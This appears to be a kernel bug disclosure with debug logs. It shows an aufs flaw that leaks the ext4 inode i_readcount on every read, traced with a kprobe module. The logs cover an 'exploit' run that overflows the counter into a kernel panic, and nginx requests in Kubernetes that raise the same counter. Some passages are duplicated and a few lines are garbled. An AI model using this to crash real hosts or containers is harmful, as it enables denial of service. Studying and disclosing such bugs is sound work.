Problem Demonstration / Instrumentation:
---------------------------------------
This kprobe kernel module ("kmod-kprobe-fput.c") inserts a
probe on __fput(), and prints the i_readcount value before
before decrementing it, when a specified filename is found.
(usage/steps on header comments.)
With aufs, there are 2 files/inodes, one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
Then aufs handles/redirects the open/read/write calls to it.
$ mkdir dir mnt
$ touch dir/test
$ sudo mount -t aufs -o br=dir none mnt
$ ls mnt
test
The problem is observable upfront: i_readcount for the real
inode/filesystem is extra incremented on the read-only open.
The same i_readcount() increments are obtained to the
'index.html' page served by nginx, as that is stored
in the container image, thus accessed via aufs.
(After deploying Kubernetes/Docker with aufs storage driver)
Start nginx pod/container:
$ kubectl run web-server --image=nginx
Get its IP address:
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
web-server 1/1 Running 0 48s 10.10.0.4 sf244755-focal <none> <none>
Test it:
$ curl -s 10.10.0.4 | grep title
<title>Welcome to nginx!</title>
Problem Demonstration / Instrumentation: ------- ------- ------- ------- ----
-------
This kprobe kernel module ("kmod- kprobe- fput.c" ) inserts a
probe on __fput(), and prints the i_readcount value before
before decrementing it, when a specified filename is found.
(usage/steps on header comments.)
$ sudo insmod kmod-kprobe-fput.ko
[ 315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)
The i_readcount value is only incremeted on reads, not writes:
$ touch test
[ 308.193058] file: test, fs type: ext4, inode readcount: 0
$ > test
[ 310.293847] file: test, fs type: ext4, inode readcount: 0
$ cat test
[ 312.667149] file: test, fs type: ext4, inode readcount: 1
$ cat test
[ 317.312413] file: test, fs type: ext4, inode readcount: 1
$ cat test
[ 319.223841] file: test, fs type: ext4, inode readcount: 1
It is decremented only when the file is closed:
$ tail -f test &
$ tail -f test &
$ tail -f test &
$ cat test
[ 365.042632] file: test, fs type: ext4, inode readcount: 4
$ kill %%
[ 372.241224] file: test, fs type: ext4, inode readcount: 3
$ kill %%
[ 376.151455] file: test, fs type: ext4, inode readcount: 2
$ kill %%
[ 378.802151] file: test, fs type: ext4, inode readcount: 1
With aufs, there are 2 files/inodes, one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
Then aufs handles/redirects the open/read/write calls to it.
$ mkdir dir mnt
$ touch dir/test
$ sudo mount -t aufs -o br=dir none mnt
$ ls mnt
test
The problem is observable upfront: i_readcount for the real
inode/filesystem is extra incremented on the read-only open.
$ cat mnt/test
[ 453.819165] file: test, fs type: aufs, inode readcount: 1
[ 453.819226] file: test, fs type: ext4, inode readcount: 2
$ cat mnt/test
[ 458.091550] file: test, fs type: aufs, inode readcount: 1
[ 458.091599] file: test, fs type: ext4, inode readcount: 3
$ cat mnt/test
[ 463.165711] file: test, fs type: aufs, inode readcount: 1
[ 463.165759] file: test, fs type: ext4, inode readcount: 4
Compare that with the non-aufs/ext4-only output above for
multiple cats ;-) - the inode's i_readcount on ext4 grows.
...
That kprobe was enabled during the 'Exploit / Local' run.
The logs show the i_readcount value incrementing until it
overflowed, when the BUG_ON()/panic happened, and crashed.
(The 'multiple' parameter only prints when i_readcount is
a multiple of its value, in unsigned type.)
$ sudo insmod kmod-kprobe-fput.ko multiple=100000
[ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)
$ cd mnt && /tmp/exploit linux/fs. h:2963! fput+0x25d/ 0x260 run+0x8f/ 0xb0 usermode_ loop+0x131/ 0x160 64+0x163/ 0x190 64_after_ hwframe+ 0x44/0xa9
[ 1799.795277] file: test, fs type: ext4, inode readcount: 100000
[ 1800.420418] file: test, fs type: ext4, inode readcount: 200000
[ 1801.030687] file: test, fs type: ext4, inode readcount: 300000
...
[ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000
...
[ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000
...
[14191.533372] file: test, fs type: ext4, inode readcount: 2000000000
...
[15156.688678] file: test, fs type: ext4, inode readcount: 2147400000
[15157.432852] file: test, fs type: ext4, inode readcount: -2147451616
...
[16123.045186] file: test, fs type: ext4, inode readcount: -2000051616
...
[22655.214420] file: test, fs type: ext4, inode readcount: -1000051616
...
[28517.303066] file: test, fs type: ext4, inode readcount: -100051616
...
[29161.058111] file: test, fs type: ext4, inode readcount: -1051616
[29161.702771] file: test, fs type: ext4, inode readcount: -951616
[29162.337571] file: test, fs type: ext4, inode readcount: -851616
[29162.980385] file: test, fs type: ext4, inode readcount: -751616
[29163.614763] file: test, fs type: ext4, inode readcount: -651616
[29164.253970] file: test, fs type: ext4, inode readcount: -551616
[29164.890793] file: test, fs type: ext4, inode readcount: -451616
[29165.566457] file: test, fs type: ext4, inode readcount: -351616
[29166.224213] file: test, fs type: ext4, inode readcount: -251616
[29166.879175] file: test, fs type: ext4, inode readcount: -151616
[29167.528966] file: test, fs type: ext4, inode readcount: -51616
[29167.862871] file: test, fs type: ext4, inode readcount: 0
[29167.864633] ------------[ cut here ]------------
[29167.866016] kernel BUG at include/
[29167.867423] invalid opcode: 0000 [#1] SMP PTI
[29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
[29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[29167.873202] RIP: 0010:__
...
[29167.901583] Call Trace:
[29167.902387] ____fput+0xe/0x10
[29167.903344] task_work_
[29167.904420] exit_to_
[29167.905749] do_syscall_
[29167.906929] entry_SYSCALL_
...
[29167.967808] Kernel panic - not syncing: Fatal exception
Example of Web Server / nginx with Kubernetes
--
The same i_readcount() increments are obtained to the
'index.html' page served by nginx, as that is stored
in the container image, thus accessed via aufs.
(After deploying Kubernetes/Docker with aufs storage driver)
Start nginx pod/container:
$ kubectl run web-server --image=nginx
Get its IP address:
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
web-server 1/1 Running 0 48s 10.10.0.4 sf244755-focal <none> <none>
Test it:
$ curl -s 10.10.0.4 | grep title
<title>Welcome to nginx!</title>
$ sudo insmod kmod-kprobe-fput.ko filename=index.html
[ 3735.601633] kmod_kprobe_fput: kprobe registered (filename: index.html, multiple: 0)
$ curl -s 10.10.0.4 >/dev/null
[ 3757.368671] file: index.html, fs type: aufs, inode readcount: 1
[ 3757.381055] file: index.html, fs type: ext4, inode readcount: 7
$ curl -s 10.10.0.4 >/dev/null
[ 3767.402218] file: index.html, fs type: aufs, inode readcount: 1
[ 3767.407846] file: index.html, fs type: ext4, inode readcount: 8
$ curl -s 10.10.0.4 >/dev/null
[ 3771.856605] file: index.html, fs type: aufs, inode readcount: 1
[ 3771.866484] file: index.html, fs type: ext4, inode readcount: 9
And the web server can be exposed/made available externally,
for example:
$ kubectl expose pod web-server --port 80 --type NodePort
$ kubectl get services web-server
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
web-server NodePort 10.100.0.69 <none> 80:32089/TCP 6s
another-host$ curl -s 192.168. 122.151: 32089 | grep title
<title>Welcome to nginx!</title>
[ 4037.893050] file: index.html, fs type: aufs, inode readcount: 1
[ 4037.909541] file: index.html, fs type: ext4, inode readcount: 10